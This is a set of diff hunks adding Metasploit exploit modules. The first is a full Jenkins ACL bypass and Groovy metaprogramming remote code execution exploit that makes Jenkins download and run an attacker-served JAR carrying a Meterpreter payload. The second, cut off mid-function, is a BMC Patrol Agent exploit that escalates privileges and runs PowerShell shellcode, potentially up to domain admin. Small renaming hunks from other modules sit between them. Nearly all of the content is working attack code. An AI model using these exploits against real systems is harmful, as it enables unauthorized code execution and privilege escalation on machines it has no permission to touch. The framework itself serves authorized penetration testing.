+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins ACL Bypass and Metaprogramming RCE',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins dynamic routing to
+        bypass the Overall/Read ACL and leverage Groovy metaprogramming to
+        download and execute a malicious JAR file.
+
+        The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
+        on later versions of Jenkins.
+
+        Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
+      },
+      'Author'         => [
+        'Orange Tsai', # Discovery and PoC
+        'wvu'          # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-1003000'], # Script Security
+        ['CVE', '2019-1003001'], # Pipeline: Groovy
+        ['CVE', '2019-1003002'], # Pipeline: Declarative
+        ['EDB', '46427'],
+        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
+        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
+        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
+        ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
+      ],
+      'DisclosureDate' => '2019-01-08', # Public disclosure
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
+          'Version'    => Gem::Version.new('2.137')
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'  => [REPEATABLE_SESSION]
+      },
+      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
+    ))
+
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
+=end
+  def check
+    checkcode = CheckCode::Safe
+
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1('/search/index'),
+      'vars_get' => {'q' => 'a'}
+    )
+
+    unless res && (version = res.headers['X-Jenkins'])
+      vprint_error('Jenkins not detected')
+      return CheckCode::Unknown
+    end
+
+    vprint_status("Jenkins #{version} detected")
+    checkcode = CheckCode::Detected
+
+    if Gem::Version.new(version) > target['Version']
+      vprint_error("Jenkins #{version} is not a supported target")
+      return CheckCode::Safe
+    end
+
+    vprint_good("Jenkins #{version} is a supported target")
+    checkcode = CheckCode::Appears
+
+    if res.body.include?('Administrator')
+      vprint_good('ACL bypass successful')
+      checkcode = CheckCode::Vulnerable
+    else
+      vprint_error('ACL bypass unsuccessful')
+      return CheckCode::Safe
+    end
+
+    checkcode
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    # NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS
+    # HACK: Both HttpClient and HttpServer use datastore['SSL']
+    ssl = datastore['SSL']
+    datastore['SSL'] = false
+    start_service('Path' => '/')
+    datastore['SSL'] = ssl
+
+    print_status('Sending Jenkins and Groovy go-go-gadgets')
+    send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1,
+      'vars_get' => {'value' => go_go_gadget2}
+    )
+  end
+
+  #
+  # Exploit methods
+  #
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
+  ?apiUrl=http://169.254.169.254/%23
+  &login=orange
+  &password=tsai
+=end
+  def go_go_gadget1(custom_uri = nil)
+    # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username
+    acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')
+
+    return normalize_uri(acl_bypass, custom_uri) if custom_uri
+
+    normalize_uri(
+      acl_bypass,
+      '/descriptorByName',
+      '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
+    )
+  end
+
+=begin
+  http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
+  ?value=
+  @GrabConfig(disableChecksums=true)%0a
+  @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
+  @Grab(group='tw.orange', module='poc', version='1')%0a
+  import Orange;
+=end
+  def go_go_gadget2
+    (
+      <<~EOF
+        @GrabConfig(disableChecksums=true)
+        @GrabResolver('http://#{srvhost_addr}:#{srvport}/')
+        @Grab('#{vendor}:#{app}:#{version}')
+        import #{app}
+      EOF
+    ).strip
+  end
+
+  #
+  # Payload methods
+  #
+
+  #
+  # If you deviate from the following sequence, you will suffer!
+  #
+  # HEAD /path/to/pom.xml     -> 404
+  # HEAD /path/to/payload.jar -> 200
+  # GET  /path/to/payload.jar -> 200
+  #
+  def on_request_uri(cli, request)
+    vprint_status("#{request.method} #{request.uri} requested")
+
+    unless %w[HEAD GET].include?(request.method)
+      vprint_error("Ignoring #{request.method} request")
+      return
+    end
+
+    if request.method == 'HEAD'
+      if request.uri != payload_uri
+        vprint_error('Sending 404')
+        return send_not_found(cli)
+      end
+
+      vprint_good('Sending 200')
+      return send_response(cli, '')
+    end
+
+    if request.uri != payload_uri
+      vprint_error('Sending bogus file')
+      return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
+    end
+
+    vprint_good('Sending payload JAR')
+    send_response(
+      cli,
+      payload_jar,
+      'Content-Type' => 'application/java-archive'
+    )
+
+    # XXX: $HOME may not work in some cases
+    register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")
+  end
+
+  def payload_jar
+    jar = payload.encoded_jar
+
+    jar.add_file("#{app}.class", exploit_class)
+    jar.add_file(
+      'META-INF/services/org.codehaus.groovy.plugins.Runners',
+      "#{app}\n"
+    )
+
+    jar.pack
+  end
+
+=begin javac Exploit.java
+  import metasploit.Payload;
+
+  public class Exploit {
+      public Exploit(){
+          try {
+              Payload.main(null);
+          } catch (Exception e) { }
+
+      }
+  }
+=end
+  def exploit_class
+    klass = Rex::Text.decode_base64(
+      <<~EOF
+        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
+        AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
+        YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
+        Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
+        L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
+        twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
+        AAAA
+      EOF
+    )
+
+    # Replace length-prefixed string "Exploit" with a random one
+    klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")
+  end
+
+  #
+  # Utility methods
+  #
+
+  def payload_uri
+    "/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"
+  end
+
+  def vendor
+    @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join
+  end
+
+  def app
+    @app ||= Faker::App.name.split(/[^[:alpha:]]/).join
+  end
+
+  def version
+    @version ||= Faker::App.semantic_version
+  end
+
+end
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
    mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
    mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')

-    register_files_for_cleanup(jsp_path)
+    register_file_for_cleanup(jsp_path)

    send_request_cgi(
      'method' => 'POST',
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
-    return CheckCode::Appears if execute_command(random_crap)
+    return CheckCode::Appears if execute_command(rand_str)

    CheckCode::Safe
  end
@@ -151,9 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
                      <name>start</name>
                      <parameter-types/>
                    </method>
-                    <name>#{random_crap}</name>
+                    <name>#{rand_str}</name>
                  </filter>
-                  <next class="string">#{random_crap}</next>
+                  <next class="string">#{rand_str}</next>
                </serviceIterator>
                <lock/>
              </cipher>
@@ -189,7 +189,7 @@ EOF
    'java.lang.String cannot be cast to java.security.Provider$Service'
  end

-  def random_crap
+  def rand_str
    Rex::Text.rand_text_alphanumeric(8..42)
  end

@@ -0,0 +1,1133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  @deflater = nil
+  @inflater = nil
+
+  SBOXES = [
+    0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000,
+    0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0,
+    0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000,
+    0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000,
+    0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000,
+    0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000,
+    0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0,
+    0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002,
+    0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800,
+    0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000,
+    0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002,
+    0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000,
+    0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002,
+    0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004,
+    0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000,
+    0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004,
+    0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000,
+    0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004,
+    0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 0x2200000, 0x0, 0x4, 0x0,
+    0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004,
+    0x1100000, 0x0, 0x1100000, 0x4, 0x0, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004,
+    0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004,
+    0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004,
+    0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000,
+    0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0,
+    0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000,
+    0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400,
+    0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000,
+    0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400,
+    0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0,
+    0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400,
+    0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000,
+    0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000,
+    0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001,
+    0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001,
+    0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001,
+    0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001,
+    0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000,
+    0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000,
+    0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002,
+    0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000,
+    0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40002, 0x0, 0x2, 0x40002,
+    0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000,
+    0x0, 0x40002, 0x40002, 0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002,
+    0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110,
+    0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000,
+    0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000,
+    0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110,
+    0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000,
+    0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000,
+    0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110,
+    0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110,
+    0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000,
+    0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0,
+    0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008,
+    0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000,
+    0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000,
+    0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000,
+    0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000,
+    0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000,
+    0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000,
+    0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000,
+    0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000,
+    0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110,
+    0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 0x80110, 0x80000, 0x0, 0x80000,
+    0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110,
+    0x0, 0x0, 0x80110, 0x110, 0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110,
+    0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110,
+    0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110,
+    0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000,
+    0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000,
+    0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000,
+    0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000,
+    0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000,
+    0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008,
+    0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800,
+    0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000,
+    0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800,
+    0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801,
+    0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1,
+    0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800,
+    0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400,
+    0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400,
+    0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400,
+    0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000,
+    0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400,
+    0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400,
+    0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 0x10000400, 0x400, 0x400, 0x10000000,
+    0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000,
+    0x8000220, 0x0, 0x8000000, 0x220, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220,
+    0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220,
+    0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220,
+    0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220,
+    0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220,
+    0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220,
+    0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220,
+    0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000,
+    0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220,
+    0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000,
+    0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0,
+    0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220
+  ].freeze
+
+  PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\
+  "\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\
+  "\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\
+  "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze
+
+  PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\
+  "\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\
+  "\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\
+  "\x23\x1C\x1F".freeze
+
+  SBOX_BYTE_ORDER = [
+    1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000,
+    0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000,
+    0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000,
+    0x40000000, 0x80000000
+  ].freeze
+
+  ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze
+  INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze
+  INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze
+
+  DES_ENCRYPT = 0
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'BMC Patrol Agent Privilege Escalation Cmd Execution',
+      'Description'    => %q(
+        This module leverages the remote command execution feature provided by
+        the BMC Patrol Agent software. It can also be used to escalate privileges
+        on Windows hosts as the software runs as SYSTEM but only verfies that the password
+        of the provided user is correct. This also means if the software is running on a
+        domain controller, it can be used to escalate from a normal domain user to domain
+        admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
+        powershell to execute the payload. The powershell version tends to timeout on
+        the first run so it may take multiple tries.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b0yd' # @rwincey / Vulnerability Discovery and MSF module author
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-20735'],
+          ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
+        ],
+      'Platform'       => ['win', 'linux'],
+      'Targets'        =>
+        [
+          [
+            'Windows Powershell Injected Shellcode', {
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'Generic Command Callback', {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix win]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true
+      },
+      'DisclosureDate' => 'Jan 17 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(3181),
+        OptString.new('USER',     [true,  'local or domain user to authenticate with patrol', 'patrol']),
+        OptString.new('PASSWORD', [true,  'password to authenticate with patrol', 'password']),
+        OptString.new('CMD',      [false, 'command to run on the target. If this option is specified the payload will be ignored.'])
+      ]
+    )
+
+  end
+
+  def cleanup
+    disconnect
+    print_status("Disconnected from BMC Patrol Agent.")
+    @inflater.close
+    @deflater.close
+    super
+  end
+
+  def get_target_os(srv_info_msg)
+    lines = srv_info_msg.split("\n")
+    fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}"
+
+    os = nil
+    ver = nil
+    lines[2..-2].each do |i|
+      val = i.split("=")
+      if val.length == 2
+        if val[0].strip! == "T"
+          os = val[1]
+        elsif val[0].strip! == "VER"
+          ver = val[1]
+        end
+      end
+    end
+    [os, ver]
+  end
+
+  def get_cmd_output(cmd_output_msg)
+
+    lines = cmd_output_msg.split("\n")
+    fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}"
+
+    # Parse out command results
+    idx_start = cmd_output_msg.index("Result\x00")
+    idx_end = cmd_output_msg.index("RemPsl_user")
+    output = cmd_output_msg[idx_start + 7..idx_end - 1]
+
+    output
+  end
+
+  def exploit
+
+    # Manually start the handler if not running a single command
+    if datastore['CMD'].nil? || datastore['CMD'].empty?
+
+      # Set to nil if the cmd is empty for checks further down
+      datastore['CMD'] = nil
+      datastore['DisablePayloadHandler'] = false
+
+      # Configure the payload handler
+      payload_instance.exploit_config = {
+        'active_timeout' => 300
+      }
+      # Setup the payload handler
+      payload_instance.setup_handler
+
+      # Start the payload handler
+      payload_instance.start_handler
+
+    end
+
+    # Initialize zlib objects
+    @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY)
+    @inflater = Zlib::Inflate.new
+
+    # Connect to the BMC Patrol Agent
+    connect
+    print_status("Connected to BMC Patrol Agent.")
+
+    # Create session msg
+    create_session
+    ret_data = receive_msg
+    fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil?
+
+    # Authenticate
+    authenticate_user(datastore['USER'], datastore['PASSWORD'])
+
+    # Receive the authentication response
+    ret_data = receive_msg
+    fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil?
+
+    ret_msg = process_response(ret_data)
+    if ret_msg =~ /logged in/
+      print_status("Successfully authenticated user.")
+    else
+      fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
+    end
+
+    # Receive the server info
+    ret_data = receive_msg
+    fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil?
+    srv_info = process_response(ret_data)
+
+    # Get the target's OS from their info msg
+    target_os = get_target_os(srv_info)
+
+    # When using autotargeting, MSF selects the Windows meterpreter as the default payload.
+    # Fail if this is the case and ask the user to select an appropriate payload.
+    if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil?
+      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
+    end
+
+    target_name = target.name
+    if !datastore['CMD'].nil?
+      command = datastore['CMD'].tr('"', '\"')
+      print_status("Command to execute: #{command}")
+    elsif target_name == 'Windows Powershell Injected Shellcode'
+      # Get encoded powershell of payload
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
+    else
+      command = payload.raw.tr('"', '\"')
+    end
+
+    # Run command
+    run_cmd(command)
+
+    # Receive command confirmation
+    ret_data = receive_msg
+    if !ret_data.nil?
+      process_response(ret_data)
+    end
+
+    # Receive command output
+    ret_data = receive_msg
+    if !ret_data.nil? && !datastore['CMD'].nil?
+      cmd_result_data = process_response(ret_data)
+      cmd_result = get_cmd_output(cmd_result_data)
+      print_status("Output:\n#{cmd_result}")
+    end
+
+    # Handle the shell
+    handler
+
+  end
+
+  def receive_msg
+
+    header = sock.get_once(6)
+    if header.nil?
+      return
+    end
+
+    payload_size_arr = header[0, 4]
+    payload_size = payload_size_arr.unpack1("N")
+    payload = ''
+    if payload_size > 0
+      payload = sock.get_once(payload_size)
+      if payload.nil?
+        return
+      end
+    end
+
+    return header + payload
+
+  end
+
+  def send_msg(type, compression, data)
+
+    data_len = data.length
+    buf = [data_len].pack('N')
+
+    # Set the type
+    buf += [type].pack('C')
+
+    # Set compression flag
+    buf += [compression].pack('C')
+
+    # Add data
+    buf += data
+
+    # Send msg
+    sock.put(buf)
+
+  end
+
+  def process_response(ret_data)
+
+    # While style checks complain, I intend to leave this parsing
+    # in place for debugging purposes
+    ret_size_arr = ret_data[0, 4]
+    ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment
+
